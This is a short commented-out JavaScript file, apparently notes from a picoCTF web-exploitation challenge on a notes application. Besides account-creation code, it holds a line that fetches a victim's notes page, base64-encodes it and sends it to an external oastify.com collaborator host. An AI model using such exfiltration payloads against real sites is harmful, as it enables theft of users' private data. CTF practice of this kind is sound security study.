// credentials-set routes have CORs disabled with credentials, we we're not able to 
// access /notes, /new, etc, but can create a new acc.
// that's why this works:
/*const url = 'http://0.0.0.0:8080/register';
const params = new URLSearchParams();
params.append('username', '0');
params.append('password', '0');

fetch(url, {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: params.toString()
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));
*/


// but this does NOT:

/*
// 1) parse the user's notes at /notes and grab the flag
fetch('http://0.0.0.0:8080/notes')
    .then(response => response.text())
    .then(text => {let flag = text.split('<p>')[1].split("</")[0]; console.log(flag);});


fetch('http://saturn.picoctf.net:56976/notes').then(response => response.text()).then(text => {const encodedData = btoa(text).replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');return fetch(`http://l1nxnllgo42ipvxd3xsagfdqrhx8l19q.oastify.com/?data=${encodedData}`);}).then(response => response.text()).then(result => console.log(result));

*/